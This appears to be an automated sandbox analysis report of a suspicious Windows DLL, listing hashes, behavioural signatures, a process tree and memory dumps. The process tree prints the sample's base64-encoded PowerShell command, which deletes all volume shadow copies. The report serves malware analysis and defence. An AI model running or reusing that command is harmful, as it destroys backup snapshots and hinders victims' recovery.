Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:45

General

  • Target

    ed70847aeee2bd0df8f5787c4f580bf7b8e46d7f46b8f6e2bf082c4014c90261.dll

  • Size

    116KB

  • MD5

    64cf38b177bd1da0e273d65643b38b38

  • SHA1

    68befa14bf6358cd2c43f7e9583dea73e115d745

  • SHA256

    ed70847aeee2bd0df8f5787c4f580bf7b8e46d7f46b8f6e2bf082c4014c90261

  • SHA512

    1eaf6dbbd78c5088112cbb77433f7bb76a02a5761acf06eca2ed93248da369df71a1ab6aee34246054d60eb6605697e1d487d6e4b92c40785a7bb7226063d047

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\ed70847aeee2bd0df8f5787c4f580bf7b8e46d7f46b8f6e2bf082c4014c90261.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1476
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\ed70847aeee2bd0df8f5787c4f580bf7b8e46d7f46b8f6e2bf082c4014c90261.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:696
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:652

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/696-56-0x000007FEFBF31000-0x000007FEFBF33000-memory.dmp
    Filesize

    8KB

  • memory/696-58-0x0000000002270000-0x0000000002272000-memory.dmp
    Filesize

    8KB

  • memory/696-59-0x0000000002272000-0x0000000002274000-memory.dmp
    Filesize

    8KB

  • memory/696-60-0x0000000002274000-0x0000000002277000-memory.dmp
    Filesize

    12KB

  • memory/696-57-0x000007FEF32C0000-0x000007FEF3E1D000-memory.dmp
    Filesize

    11.4MB

  • memory/696-61-0x000000001B710000-0x000000001BA0F000-memory.dmp
    Filesize

    3.0MB

  • memory/696-62-0x000000000227B000-0x000000000229A000-memory.dmp
    Filesize

    124KB

  • memory/1768-55-0x00000000758A1000-0x00000000758A3000-memory.dmp
    Filesize

    8KB